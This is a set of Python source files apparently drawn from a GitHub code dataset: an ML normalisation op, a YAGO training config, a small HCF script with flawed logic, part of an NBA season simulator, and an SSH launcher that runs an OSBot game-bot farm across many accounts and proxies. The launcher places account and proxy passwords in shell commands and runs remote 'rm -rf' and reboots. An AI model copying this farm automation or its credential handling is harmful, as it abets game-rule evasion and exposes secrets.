NumpyOp\nfrom fastestimator.util.traceability_util import traceable\n\n\n@traceable()\nclass Minmax(NumpyOp):\n \"\"\"Normalize data using the minmax method.\n\n Args:\n inputs: Key(s) of images to be modified.\n outputs: Key(s) into which to write the modified images.\n mode: What mode(s) to execute this Op in. For example, \"train\", \"eval\", \"test\", or \"infer\". To execute\n regardless of mode, pass None. To execute in all modes except for a particular one, you can pass an argument\n like \"!infer\" or \"!train\".\n ds_id: What dataset id(s) to execute this Op in. To execute regardless of ds_id, pass None. 
To execute in all\n ds_ids except for a particular one, you can pass an argument like \"!ds1\".\n epsilon: A small value to prevent numeric instability in the division.\n new_min: The desired minimum value after the minmax operation.\n new_max: The desired maximum value after the minmax operation.\n \"\"\"\n def __init__(self,\n inputs: Union[str, Iterable[str]],\n outputs: Union[str, Iterable[str]],\n mode: Union[None, str, Iterable[str]] = None,\n ds_id: Union[None, str, Iterable[str]] = None,\n epsilon: float = 1e-7,\n new_min: float = 0.0,\n new_max: float = 1.0):\n super().__init__(inputs=inputs, outputs=outputs, mode=mode, ds_id=ds_id)\n self.epsilon = epsilon\n self.new_min = new_min\n self.new_max = new_max\n self.in_list, self.out_list = True, True\n assert new_max > new_min, \"the new_max should be greater than new_min.\"\n\n def forward(self, data: List[np.ndarray], state: Dict[str, Any]) -> List[np.ndarray]:\n return [self._apply_minmax(elem) for elem in data]\n\n def _apply_minmax(self, data: np.ndarray) -> np.ndarray:\n data_max = np.max(data)\n data_min = np.min(data)\n data_rescaled = (data - data_min) / max((data_max - data_min), self.epsilon)\n data = data_rescaled * (self.new_max - self.new_min) + self.new_min\n return data.astype(np.float32)\n","repo_name":"fastestimator/fastestimator","sub_path":"fastestimator/op/numpyop/univariate/minmax.py","file_name":"minmax.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"31"} +{"seq_id":"35792029785","text":"import os\nimport time\nfrom logging import handlers, getLogger, DEBUG\nfrom random import seed, randint\n\nfrom gevent import spawn, sleep, joinall\nfrom pssh.clients.native.single import SSHClient\n\nimport constants\nfrom database import Settings\n\nimport traceback\n\n\ndef clear_old():\n while True:\n # print(\"Cleaning\")\n try:\n now = time.time()\n for filename in os.listdir('logs'):\n if os.path.getmtime(os.path.join('logs', filename)) < now - 12 * 60 * 60:\n if os.path.isfile(os.path.join('logs', filename)):\n try:\n os.remove(os.path.join('logs', filename))\n except OSError:\n # print('file is in use, skipping')\n pass\n except Exception as e:\n print(e)\n traceback.print_exc()\n sleep(15 * 60)\n # sleep(1)\n\n\nclass Launcher:\n\n def __init__(self, account_state, database):\n self.account_state = account_state\n self.database = database\n self.restarting = set()\n seed(1)\n spawn(clear_old)\n\n def check_should_restart(self, output_line):\n if constants.should_restart_members == output_line:\n return True, True\n elif constants.should_restart_free == output_line:\n return True, False\n elif constants.should_restart_any == output_line or \\\n output_line in constants.should_restart_messages or \\\n output_line.startswith('Bot exited with code') and not output_line.endswith('143') or \\\n output_line.startswith('[ERROR]') and output_line.endswith('Failed to load hooks!'):\n return True, None\n return False, None\n\n def read_output(self, output, logger, vps, account, script, launcher_settings):\n restart_flag = False\n bot_froze_flag = None\n for line in iter(output):\n try:\n if line.startswith('[STATUS UPDATE]'):\n self.account_state.set_status(account['username'], line[17:])\n continue\n # print(line)\n # print(line, file=file, flush=True)\n logger.debug(line)\n if restart_flag:\n continue\n should_restart, should_change_mem = self.check_should_restart(line)\n if should_restart:\n print('Received output signaling to 
restart {}: {}'.format(account['username'], line))\n restart_flag = True\n if should_change_mem is not None:\n self.database.update_account_members(account['username'], should_change_mem)\n account['members'] = should_change_mem\n self.restart(vps, account, script, launcher_settings)\n elif line.startswith('[INFO][') and line.endswith(': Started bot #1'):\n print('Got bot starting output for {}, starting timer'.format(account['username']))\n\n def func():\n sleep(120)\n if bot_froze_flag:\n print('Detected bot froze on initialization for {}, restarting: {}'\n .format(account['username'], output))\n self.restart(vps, account, script, launcher_settings)\n nonlocal restart_flag\n restart_flag = True\n\n bot_froze_flag = True\n spawn(func)\n elif bot_froze_flag is not None and bot_froze_flag:\n print('Detected output after bot initialization output for {}'.format(account['username']))\n bot_froze_flag = False\n except Exception as e:\n print(\"Error reading output for {}\".format(account['username']))\n print(e)\n traceback.print_exc()\n print('ending output read for {}'.format(account['username']))\n\n def run(self, vps, account, script, launcher_settings):\n def func():\n try:\n client = SSHClient(vps['ip'].strip(), user=vps['username'], password=vps['password'], port=vps['port'])\n except Exception as e:\n print(e)\n traceback.print_exc()\n return\n print(\"Connected\")\n try:\n worlds = constants.member_worlds if account['members'] else constants.free_worlds\n settings = ['+{}~{}'.format(setting, value) for setting, value in script['settings'].items()]\n settings.append('+bond_accounts~{}'.format(launcher_settings['bond_accounts']))\n proxy_login = account if 'proxy_username' in account and account['proxy_username'] is not None \\\n else launcher_settings\n command = 'DISPLAY=:1 java -jar osbot.jar -allow norandoms,norender -login -autologin ' \\\n '-bot u:p:0000 ' \\\n '-proxy {}:{}:{}:{} ' \\\n '-script MMF_Farm:username~{}+password~{}+type~{}{} ' \\\n '-debug 0 -world {}'.format(account['proxy_ip'], account['proxy_port'],\n proxy_login['proxy_username'],\n proxy_login['proxy_password'],\n account['username'], account['password'],\n script['name'], ''.join(settings),\n worlds[randint(0, len(worlds) - 1)])\n print(command)\n self.account_state.set_account_start(account['username'])\n output = client.run_command(command)\n # log_file = open('logs/{}.txt'.format(account['username']), 'a')\n logger = getLogger(account['username'])\n logger.setLevel(DEBUG)\n handler = handlers.RotatingFileHandler('logs/{}.log'.format(account['username']),\n maxBytes=(10 ** 6) / 2, backupCount=2)\n logger.addHandler(handler)\n readers = [spawn(self.read_output, out, logger, vps, account, script, launcher_settings)\n for out in (output.stdout, output.stderr)]\n client.wait_finished(output.channel)\n self.account_state.set_account_end(account['username'])\n client.disconnect()\n joinall(readers)\n logger.removeHandler(handler)\n handler.close()\n except Exception as e:\n print('Exception starting account {} on {}'.format(account['username'], vps['ip']))\n print(e)\n traceback.print_exc()\n print('end main')\n\n print('Starting {} on {}'.format(account['username'], vps['ip']))\n return spawn(func)\n\n def run_all(self, vps_list_with_accounts, script, launcher_settings):\n sleep_time = self.database.get_setting(Settings.Launcher)['run_interval']\n for element in vps_list_with_accounts:\n def func(vps):\n for account in vps['accounts']:\n print('starting account: {}'.format(account))\n self.run(vps, account, 
script, launcher_settings)\n print(f'sleeping for {sleep_time}')\n sleep(sleep_time)\n\n spawn(func, element)\n\n def kill_all(self, vps_list):\n for element in vps_list:\n def func(vps):\n print(\"about to kill all on {}\".format(vps['ip']))\n try:\n client = SSHClient(vps['ip'].strip(), user=vps['username'],\n password=vps['password'], port=vps['port'])\n except Exception as e:\n print(e)\n traceback.print_exc()\n return\n print(\"Connected\")\n command = 'pkill -f \"[j]ava.*osbot\"'\n print(command)\n output = client.run_command(command)\n client.wait_finished(output.channel)\n client.disconnect()\n print('end kill')\n\n spawn(func, element)\n\n def kill_one(self, vps, account, run_async=True):\n def func():\n print('about to kill {} on {}'.format(account['username'], vps['ip']))\n self.restarting.discard(account['username'])\n try:\n client = SSHClient(vps['ip'].strip(), user=vps['username'],\n password=vps['password'], port=vps['port'])\n except Exception as e:\n print(e)\n traceback.print_exc()\n return\n print('connected')\n command = 'pkill -f \"[j]ava.*username~{}\\\\+password~{}\"' \\\n .format(account['username'], account['password'])\n output = client.run_command(command)\n client.wait_finished(output.channel)\n client.disconnect()\n print('end kill')\n\n if run_async:\n spawn(func)\n else:\n func()\n\n def restart(self, vps, account, script, launcher_settings):\n sleep_time = self.database.get_setting(Settings.Launcher)['run_interval']\n\n def func():\n self.kill_one(vps, account, run_async=False)\n self.restarting.add(account['username'])\n print(f'sleeping for {sleep_time}')\n sleep(sleep_time)\n if account['username'] not in self.restarting:\n return\n self.restarting.discard(account['username'])\n self.run(vps, account, script, launcher_settings)\n\n spawn(func)\n\n def update_files(self, groups, osbot_file=None, script_file=None):\n # for element in self.database.get_all_vps():\n def func(vps):\n print(\"about to update files on {}\".format(vps['ip']))\n try:\n client = SSHClient(vps['ip'].strip(), user=vps['username'],\n password=vps['password'], port=vps['port'])\n except Exception as e:\n print(e)\n traceback.print_exc()\n return\n\n print('connected')\n\n if osbot_file is not None:\n try:\n channel = client.open_session()\n client.execute('rm -f osbot.jar', channel=channel)\n client.wait_finished(channel)\n print('sending osbot file')\n client.scp_send('osbot.jar', 'osbot.jar')\n sleep(5)\n except Exception as e:\n print(e)\n traceback.print_exc()\n\n if script_file is not None:\n try:\n channel = client.open_session()\n client.execute('rm -f OSBot/Scripts/script.jar', channel=channel)\n client.wait_finished(channel)\n print('sending script file')\n client.scp_send('script.jar', 'OSBot/Scripts/script.jar')\n sleep(5)\n except Exception as e:\n print(e)\n traceback.print_exc()\n\n print('Files sent')\n\n client.disconnect()\n\n joinall([spawn(func, vps) for vps in self.database.get_vps_for_groups(groups)])\n\n def reboot_all(self):\n def reboot(vps):\n print(\"about to reboot {}\".format(vps['ip']))\n try:\n client = SSHClient(vps['ip'].strip(), user=vps['username'],\n password=vps['password'], port=vps['port'])\n except Exception as e:\n print(e)\n traceback.print_exc()\n return\n\n print('connected')\n try:\n channel = client.open_session()\n client.execute('sudo reboot', channel=channel)\n client.wait_finished(channel)\n except Exception as e:\n print(e)\n traceback.print_exc()\n print('finished')\n client.disconnect()\n vps_list = self.database.get_all_vps()\n for 
element in vps_list:\n spawn(reboot, element)\n\n def vnc_all(self):\n def vnc(vps):\n print(\"about to vnc {}\".format(vps['ip']))\n try:\n client = SSHClient(vps['ip'].strip(), user=vps['username'],\n password=vps['password'], port=vps['port'])\n except Exception as e:\n print(e)\n traceback.print_exc()\n return\n\n print('connected')\n try:\n channel = client.open_session()\n client.execute('vncserver', channel=channel)\n client.wait_finished(channel)\n except Exception as e:\n print(e)\n traceback.print_exc()\n print('finished')\n client.disconnect()\n\n vps_list = self.database.get_all_vps()\n for element in vps_list:\n spawn(vnc, element)\n\n def remove_account_ages(self, vps_list):\n def remove_ages_from(vps):\n print(f'removing ages from {vps[\"ip\"]}')\n\n try:\n client = SSHClient(vps['ip'].strip(), user=vps['username'],\n password=vps['password'], port=vps['port'])\n except Exception as e:\n print(e)\n traceback.print_exc()\n return\n\n print('connected')\n try:\n channel = client.open_session()\n client.execute('rm -rf /home/burntish/OSBot/Data/camaro/mmf_farm', channel=channel)\n client.wait_finished(channel)\n except Exception as e:\n print(e)\n traceback.print_exc()\n print('finished')\n client.disconnect()\n\n [spawn(remove_ages_from, vps) for vps in vps_list]\n","repo_name":"mattandreas/Account-Manager","sub_path":"launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":14287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1954708091","text":"# Python program to find H.C.F of two numbers\n\n# define a function\ndef compute_hcf(x, y):\n hcf = 0\n# choose the smaller number\n if x > y:\n smaller = y\n else:\n smaller = x\n for i in range(1, smaller+1):\n if((x % i == 0) and (y % i == 0)):\n hcf = i \n return hcf\n\nif __name__ == \"__main__\":\n listof = [2,3,4,5,6]\n #num1 = 1 \n #num2 = 12\n res = 1\n for i in range(len(listof)-1):\n result = compute_hcf(listof[i], listof[i+1])\n if res < result:\n res = result\n\nprint(\"The H.C.F. 
is\", res)","repo_name":"Rinki8890/PythonTrial","sub_path":"AmazonCodeWork/GCD.py","file_name":"GCD.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9706870964","text":"from input_pipeline.yago_input_pipeline import train_dataflow, test_dataflow, profiling_dataflow, profiling_test_df\nfrom models.yago_convE_kb_model import YAGOConveMultimodel\nfrom train.yago_training import SingleGPUTrainer\nfrom test.test_runner import TestRunner\nfrom tensorpack import *\nimport numpy as np\nimport tensorflow as tf\n\n\nfiles = {\n \"train_S\": \"../assets/yago-processed/train_s.mdb\",\n \"train_N\": \"../assets/yago-processed/train_n.mdb\",\n \"train_I\": \"../assets/yago-processed/train_i.mdb\",\n \"train_D\": \"../assets/yago-processed/train_d.mdb\",\n \"test\": \"../assets/yago-processed/test.mdb\",\n \"meta\": \"../assets/yago-processed/meta.npy\"\n}\n\n\nmeta = np.load(files[\"meta\"]).item(0)\n\nhyperparams = {\n \"dtype\": tf.float32,\n \"id_dtype\": tf.int32,\n \"emb_dim\": 200,\n \"MLPLayers\": 2,\n \"GRULayers\": 2,\n \"CNNTextLayers\": 2,\n \"CNNTextDilation\": 2,\n \"CNNTextKernel\": 4,\n \"entity_size\": meta[\"maxentityid\"] + 1,\n \"relation_size\": len(meta[\"rel2id\"]) + 1,\n \"word_size\": len(meta[\"word2id\"]) + 1,\n \"normalize_e1\": False,\n \"normalize_relation\": False,\n \"normalize_e2\": False,\n \"test_normalize_e1\": False,\n \"test_normalize_relation\": False,\n \"test_normalize_e2\": False,\n \"regularization_coefficient\": 0.0,\n \"learning_rate\": 0.003,\n \"lr_decay\": 0.995,\n \"label_smoothing\": 0.1,\n \"batch_size\": 256,\n \"bias\": False,\n \"debug\": False,\n \"emb_keepprob\": 0.8,\n \"fm_keepprob\": 0.8,\n \"mlp_keepprob\": 0.7,\n \"enc_keepprob\": 0.9\n}\n\nutils.logger.set_logger_dir(\"./logs\", action=\"d\")\n\ncbs = [\n PeriodicCallback(TensorPrinter([\"loss\", \"lr\"]), every_k_steps=1000),\n TestRunner(\n test_dataflow(files[\"test\"], files[\"meta\"], 32),\n [ScalarStats(\"mrr\"), ScalarStats(\"hits_1\"), ScalarStats(\"hits_3\"), ScalarStats(\"hits_10\"),\n ScalarStats(\"label_smoothing\"), ScalarStats(\"inv_e2\")])\n]\n\nmonitors = [\n callbacks.ScalarPrinter(),\n callbacks.JSONWriter(),\n TFEventWriter(logdir=\"/mnt/data/log\", max_queue=5, flush_secs=2)\n]\n\ncfg = TrainConfig(\n model=YAGOConveMultimodel(hyperparams),\n data=train_dataflow(files[\"train_S\"], files[\"meta\"], hyperparams[\"batch_size\"], 300),\n max_epoch=200,\n steps_per_epoch=meta[\"train_size\"] // hyperparams[\"batch_size\"],\n monitors=monitors,\n callbacks=cbs\n)\n\ntrainer = SingleGPUTrainer(hyperparams)\n\nlaunch_train_with_config(cfg, trainer)\n","repo_name":"pouyapez/mkbe","sub_path":"MKBE/tasks/train_yago_kb.py","file_name":"train_yago_kb.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"31"} +{"seq_id":"22829858595","text":"class ProgressBar:\n\tdef __init__(self,msg,end,cnt,len,dc,pc):\n\t\tself.prefix = msg\n\t\tself.suffix = end\n\t\tself.total = int(cnt)\n\t\tself.length = int(len)\n\t\tself.doneChar = dc[:1]\n\t\tself.progChar = pc[:1]\n\t\tself.counter = 0\n\t\tself.complete = False\n\tdef push(self):\n\t\tself.counter += 1\n\t\tif self.complete == True:\n\t\t\treturn None\n\t\telif self.counter == self.total:\n\t\t\tsys.stdout.write(self.prefix+' | ['+(self.doneChar*self.length)+'] 100.00% 
')\n\t\t\tsys.stdout.write('\\r\\n')\n\t\t\tself.end()\n\t\telse:\n\t\t\tsys.stdout.write(self.prefix+' | ['+self.indicator(self.percentage(self.counter))+'] '+format(float(self.percentage(self.counter))*100,'.3f')+'%')\n\t\t\tsys.stdout.write('\\r')\n\t\t\tsys.stdout.flush()\n\tdef percentage(self,c):\n\t\treturn c/self.total\n\tdef indicator(self,p):\n\t\tcurrLen = round((float(p))*self.length)\n\t\treturn (self.doneChar*currLen)+(self.progChar*(self.length-currLen))\n\tdef end(self):\n\t\tprint(self.suffix)\n\t\tself.complete = True\n\ndef setupConfig():\n\tos.chdir(os.path.dirname(__file__))\n\t\n\ttry: # Attempt to open the config file\n\t\topen(_CFGFILENAME,'r')\n\t\n\texcept FileNotFoundError: # There is no config file!\n\t\tprint('\\nNo config file found at {}'.format(_CFGFILENAME))\n\t\tprint('Default settings will be used.')\n\t\t\n\t\tsetupLoad(False) # Vars will be loaded from base defaults.\n\t\t\n\telse:\n\t\ttry: # Attempt to process the config file\n\t\t\t_CONFIG.read(_CFGFILENAME)\n\t\t\n\t\texcept configparser.ParsingError: # The file is corrupt.\n\t\t\tprint('\\nConfig file at {} is corrupt!'.format(_CFGFILENAME))\n\t\t\tprint('Default settings will be used.')\n\t\t\t\n\t\t\tsetupLoad(False) # Vars will be loaded from base defaults.\n\t\t\t\n\t\telse:\n\t\t\tglobal _CFGDATALOAD\n\t\t\t_CFGDATALOAD = True # Mark that the file is valid.\n\t\t\t\n\t\t\tsetupLoad(True) # Vars will be loaded from config data.\n\t\t\t\ndef setupLoad(t):\n\tif not t: # The config file did not load successfully\n\t\tfor key, val in zip(_SS_DEFAULTSETTINGKEYS, _SS_DEFAULTSETTINGVALS): # Iterate through the default keys and values\n\t\t\tglobals()[key] = val # Set variables as globals\n\t\n\telse:\n\t\t# Manually set all globals.\n\t\ttry:\n\t\t\tglobals()['_SS_DATASRC'] = _CONFIG['Project']['DataSource']\n\t\t\tglobals()['_SS_DATASRCFN'] = _CONFIG['Project']['DataSourceFile']\n\t\t\tglobals()['_SS_EXPORT'] = _CONFIG['Project']['FileName']\n\t\t\tglobals()['_SS_SIMCNT'] = abs(_CONFIG['Project'].getint('Simulate'))\n\t\t\tglobals()['_SS_DODOWNLD'] = _CONFIG['Project'].getboolean('DownloadFile')\n\t\t\tglobals()['_SS_SHOWPB'] = _CONFIG['Visual'].getboolean('ProgressBar')\n\t\t\tglobals()['_SS_NAME'] = _CONFIG['Visual']['Name']\n\t\t\tglobals()['_SS_SHOWOUTPUT'] = _CONFIG['Visual'].getboolean('ShowOutput')\n\t\t\tglobals()['_SS_TCREATE'] = _CONFIG['Build'].getint('TimestampCreate')\n\t\t\tglobals()['_SS_TUPDATE'] = _CONFIG['Build'].getint('TimestampUpdate')\n\t\t\tglobals()['_SS_BUILD'] = _CONFIG['Build']['VersionString']\n\t\t\tglobals()['_SS_PBCPROG'] = _CONFIG['Visual']['ProgBarIncompleteChar']\n\t\t\tglobals()['_SS_PBCCMPT'] = _CONFIG['Visual']['ProgBarDoneChar']\n\t\texcept KeyError as error:\n\t\t\tprint('A critical key in the configuration file is missing:\\n {}'.format(error))\n\t\t\texit()\n\ndef initWelcome():\n\tglobal _CFGDATALOAD # Load the global state for this variable.\n\t\n\t# From this point on, we will welcome the user and print the config data.\t\n\tif _CFGDATALOAD:\n\t\tprint('\\nWelcome to {}!'.format(_SS_NAME))\n\t\t\n\tprint('\\nThis program will simulate the remainder of the current NBA season a certain number of times. 
The results will be in a CSV file.')\n\t\n\tif _CFGDATALOAD:\n\t\tprint('\\nCreate Date\\t{}'.format(datetime.fromtimestamp(_SS_TCREATE, pytz.timezone('America/Denver')).isoformat()))\n\t\tprint('Update Date\\t{}'.format(datetime.fromtimestamp(_SS_TUPDATE, pytz.timezone('America/Denver')).isoformat()))\n\t\tprint('Version\\t\\t{}'.format(_SS_BUILD))\n\t\t\n\tprint('\\nData Source\\t{}'.format(_SS_DATASRC))\n\tprint('Data Source To\\t{}'.format(_SS_DATASRCFN))\n\tprint('File Name\\t{}'.format(_SS_EXPORT))\n\tprint('Simulations\\t{}'.format(_SS_SIMCNT))\n\tprint('Show Prog Bar\\t{}'.format(_SS_SHOWPB))\n\t\ndef updateDataSrc():\n\tif _SS_SHOWOUTPUT: # Gets initial start time for download\n\t\tprint('\\nPreparing download of data source.')\n\t\t\n\t\t_BEGINTIME = time.time()\n\t\t\n\t\tprint('Downloading data source ...')\n\t\n\ttry:\n\t\turllib.request.urlretrieve(_SS_DATASRC, _SS_DIRNAME+_SS_DATASRCFN)\n\t\n\texcept urllib.error.HTTPError as error: # Handle HTTP status codes\n\t\tprint('\\nThe file was unable to download:\\n[{}] {}'.format(error.code,error.reason))\n\t\texit()\n\t\t\n\texcept urllib.error.URLError as error: # Handle generic network errors\n\t\tprint('\\nThe file was unable to download correctly:\\n{}'.format(error.reason))\n\t\texit()\n\t\t\n\texcept PermissionError as error: # Most likely the file is open, preventing it from being written to. Could also be an attrib error.\n\t\tprint('\\nThe file appears to be open on your system! Close it!')\n\t\texit()\n\t\n\tif _SS_SHOWOUTPUT: # Gets end time for download and prints elapsed time & network speed.\n\t\t_ENDTIME = time.time()\n\t\t_ELAPSEDTIME = _ENDTIME-_BEGINTIME\n\t\t_FILESIZE = os.path.getsize(_SS_DIRNAME+_SS_DATASRCFN)\n\t\tprint('Download completed successfully. ({:.3f} seconds, {:.2f} kB/s)'.format(_ELAPSEDTIME,(_FILESIZE/_ELAPSEDTIME)/1024))\n\n'''\n\tCreates the volatile storage that will eventually be dumped to the csv file.\n\tRight now, all values are set to 0, because no simulations have yet occurred.\n\t\n\tIt also creates the list of games to simulate.\n'''\n\ndef createStorage():\n\tif _SS_SHOWPB:\n\t\t_PB_LISTS = ProgressBar('Creating volatile storage ...','Storage created!\\n',_SS_TEAMCOUNT,36,_SS_PBCCMPT,_SS_PBCPROG)\n\t\n\tfor s in _SS_ALLTEAMIDS: # Loop through all teams\n\t\t_TEAMWINS[s] = [0,0] # Idx 0 stores the current wins, Idx 1 stores the simulated wins per simulation.\n\t\t_SEEDPOS[s] = {\"1\":0,\"2\":0,\"3\":0,\"4\":0,\"5\":0,\"6\":0,\"7\":0,\"8\":0,\"9\":0,\"10\":0,\"11\":0,\"12\":0,\"13\":0,\"14\":0,\"15\":0} # Each key denotes a seed. The value is how many times that was simulated total.\n\t\t_WINTTL[s] = 0 # Stores the total simulated wins.\n\t\t_MINMAX[s] = [83,-1] # Idx 0 stores the minima wins, Idx 1 stores the maxima wins. The constant values are set to 83/-1 or -1/83 so the first season trial is able to modify the values correctly. \n\t\t\n\t\tif _SS_SHOWPB:\n\t\t\t_PB_LISTS.push()\n\n'''\n\tComputes ALL games that have been marked as completed. 
This function overrides date control.\n'''\n\ndef games2Sim():\n\tif _SS_SHOWPB:\n\t\t_PB_GMS2S = ProgressBar('Getting schedules ...','Schedules created!\\n',len(range(_FGIDXSSN,_CSVLINES)),36,_SS_PBCCMPT,_SS_PBCPROG)\n\n\tfor g in range(_FGIDXSSN,_CSVLINES):\n\t\tif str(_CSV['score1'][g]) == 'nan':\n\t\t\t_GAMES2SIM.append(g)\n\t\t\t\n\t\tif _SS_SHOWPB:\n\t\t\t_PB_GMS2S.push()\n\t\n'''\n\tProcesses the current win records of all teams by looping through played games.\n\tWin records are entered into the zeroth index per team key in _TEAMWINS.\n'''\n\ndef currentWinRecords():\n\tif _SS_SHOWPB:\n\t\t_PB_WINRC = ProgressBar('Processing win records ...','Win records processed!\\n',len(list(range(_FGIDXSSN, _FGIDXSIMDAY))),36,_SS_PBCCMPT,_SS_PBCPROG)\n\t\n\tfor w in range(_FGIDXSSN, _FGIDXSIMDAY): # Loop through all played games\n\t\tif int(_CSV['score1'][w]) > int(_CSV['score2'][w]): # Check if home team scored more than away team\n\t\t\t_TEAMWINS[_CSV['team1'][w]][0] += 1 # Yes, give the home team a win\n\t\telse:\n\t\t\t_TEAMWINS[_CSV['team2'][w]][0] += 1 # No, give the away team a win\n\t\t\n\t\tif _SS_SHOWPB:\n\t\t\t_PB_WINRC.push()\n\t\t\n'''\n\tControls the simulation of each season. There are several steps to the process for each individual season:\n\t\n\t1. Creates a random float for each game that is to be simulated.\n\t2. Checks if said float is greater than the win probability for the home team.\n\t3. If it is, then the away team won, and they are given a win.\n\t4. Otherwise, the home team won; they are given a win instead.\n\t5. Enters another function and begins to sort the data.\n\t6. After the data is sorted and the season completes, resets the data in order to simulate a brand new season.\n'''\n\ndef simulateIndividualSeason():\n\tif _SS_SHOWPB:\n\t\t_PB_SIMSS = ProgressBar('Simulating seasons ...','Seasons simulated!\\n',_SS_SIMCNT,36,_SS_PBCCMPT,_SS_PBCPROG)\n\t\n\tfor s in range(_SS_SIMCNT):\n\t\t_RANDOM = []\n\t\tfor rg in range(len(_GAMES2SIM)):\n\t\t\t_RANDOM.append(random()) # Create a random float for each game that is to be simulated.\n\t\tfor rn in range(len(_GAMES2SIM)):\n\t\t\tif _RANDOM[rn] > float(_CSV['carmelo_prob1'][_GAMES2SIM[rn]]): # Check who won the game\n\t\t\t\t_TEAMWINS[_CSV['team2'][_GAMES2SIM[rn]]][1] += 1 # Float greater than probability, so away team wins\n\t\t\telse:\n\t\t\t\t_TEAMWINS[_CSV['team1'][_GAMES2SIM[rn]]][1] += 1 # Float less than probability, so home team wins\n\t\t\n\t\tseasonDataSum(_TEAMWINS) # Sort & sum season data\n\t\t\n\t\tif _SS_SHOWPB:\n\t\t\t_PB_SIMSS.push()\n\t\t\t\n\t\tfor rs in range(len(_TEAMWINS)): # Reset the win values for the next season.\n\t\t\t_TEAMWINS[_SS_ALLTEAMIDS[rs]][1] = 0\n\ndef seasonDataSum(w):\n\t_WTEAM = {}\n\t_WSORT = {}\n\t_ETEAM = {}\n\t_ESORT = {}\n\t\n\tfor cs in range(_SS_TEAMCOUNT):\n\t\t_SSNWINS = w[_SS_ALLTEAMIDS[cs]][0] + w[_SS_ALLTEAMIDS[cs]][1]\n\t\tif _SS_CONFERENCE[cs]:\n\t\t\t_WTEAM[_SS_ALLTEAMIDS[cs]] = _SSNWINS\n\t\telse:\n\t\t\t_ETEAM[_SS_ALLTEAMIDS[cs]] = _SSNWINS\n\t\n\t# The following solution must be credited to Mark on StackOverflow. 
Thanks, Mark!\n\t# https://stackoverflow.com/a/2258273\n\t_WSORT = sorted(_WTEAM.items(), key=lambda x: x[1], reverse=True) # Sorts the WC teams by wins (returns a tuple)\n\t_ESORT = sorted(_ETEAM.items(), key=lambda x: x[1], reverse=True) # Sorts the EC teams by wins (returns a tuple)\n\t\n\t# Convert back to a dict\n\t_WSORT = dict(_WSORT)\n\t_ESORT = dict(_ESORT)\n\t\n\t# Add the current seed positions to the seed position master\n\tfor sp in range(_SS_TEAMSPERCONF):\n\t\t_SEEDPOS[list(_WSORT.keys())[sp]][str(sp+1)] += 1\n\t\t_SEEDPOS[list(_ESORT.keys())[sp]][str(sp+1)] += 1\n\t\n\t# Add the season win total to the win master\n\tfor wt in range(_SS_TEAMSPERCONF):\n\t\t_WINTTL[list(_WSORT.keys())[wt]] += _WSORT[list(_WSORT.keys())[wt]]\n\t\t_WINTTL[list(_ESORT.keys())[wt]] += _ESORT[list(_ESORT.keys())[wt]]\n\t\t\n\t# If the win count was an extreme, update the value in _MINMAX to reflect it.\n\t# This function will require some explaining.\n\tfor mm in _SS_ALLTEAMIDS:\n\t\tif _SS_CONFERENCE[_SS_ALLTEAMIDS.index(mm)] == 0: # Checks the conference. If true, then team mm is in the East.\n\t\t\tif _ESORT[list(_ESORT.keys())[list(_ESORT.keys()).index(mm)]] < _MINMAX[mm][0]: # Checks if the current wins is less than the minima.\n\t\t\t\t_MINMAX[mm][0] = _ESORT[list(_ESORT.keys())[list(_ESORT.keys()).index(mm)]] # Set the minima to the current wins.\n\t\t\tif _ESORT[list(_ESORT.keys())[list(_ESORT.keys()).index(mm)]] > _MINMAX[mm][1]: # Checks if the current wins is greater than the maxima. The reason elif is not used is because the first season has it being both the min/max.\n\t\t\t\t_MINMAX[mm][1] = _ESORT[list(_ESORT.keys())[list(_ESORT.keys()).index(mm)]] # Set the maxima to the current wins.\n\t\t\t\n\t\telse: # Team mm is in the West.\n\t\t\tif _WSORT[list(_WSORT.keys())[list(_WSORT.keys()).index(mm)]] < _MINMAX[mm][0]:\n\t\t\t\t_MINMAX[mm][0] = _WSORT[list(_WSORT.keys())[list(_WSORT.keys()).index(mm)]]\n\t\t\tif _WSORT[list(_WSORT.keys())[list(_WSORT.keys()).index(mm)]] > _MINMAX[mm][1]:\n\t\t\t\t_MINMAX[mm][1] = _WSORT[list(_WSORT.keys())[list(_WSORT.keys()).index(mm)]]\n\t\t\t\n\t\t\t\n\t\t\ndef blankFile():\n\ttry:\n\t\topen(_SS_DIRNAME+_SS_EXPORT,'w').close() # Blanks file for re-writing\n\t\n\texcept PermissionError: # Most likely the file is open, preventing it from being written to. Could also be an attrib error. Because data may have been processing for a while, we give an option to retry.\n\t\tprint('\\nThe file appears to be open on your system!')\n\t\tinput('Hit to attempt a re-write, or to cancel.')\n\t\tblankFile()\n\t\ndef writeCsv():\n\t_WINCOUNTS = []\n\t_ESORT = []\n\t_WSORT = []\n\t_LSORT = []\n\t\n\t_WINCOUNTS = sorted(_WINTTL.items(), key=lambda x: x[1], reverse=True) # Sorts all teams by total win count (returns a tuple)\n\t_WINCOUNTS = dict(_WINCOUNTS) # And... 
back to a dictionary.\n\t\n\tfor k in list(_WINCOUNTS.keys()): # Create the conference team lists that will appear in the csv file.\n\t\tif _SS_CONFERENCE[_SS_ALLTEAMIDS.index(k)]: # Team is in the West\n\t\t\t_WSORT.append(k)\n\t\telse: # Team is in the East\n\t\t\t_ESORT.append(k)\n\t_LSORT = _ESORT + _WSORT # Merge the conferences for the master list.\n\t\n\ttry:\n\t\twith open(_SS_DIRNAME+_SS_EXPORT,'a') as f: # Open the file as append.\n\t\t\tfor c in range(0,2): # Iterate for each conference.\n\t\t\t\tif not c: # Start with the East; the y-intercept for range is 0 (idx 0-14)\n\t\t\t\t\tnc = 0\n\t\t\t\telse: # End with the West; the y-intercept for range is 15 (idx 15-29)\n\t\t\t\t\tnc = _SS_TEAMSPERCONF\n\t\t\t\t\n\t\t\t\tfor head in range(0,_SS_TEAMSPERCONF): # Write the header row first\n\t\t\t\t\tif head == 0: # First cell must be 'Team'\n\t\t\t\t\t\tf.write('Team,'+_LSORT[head+nc]+',')\n\t\t\t\t\telif head == 14: # If it's the last one, append a linebreak at the 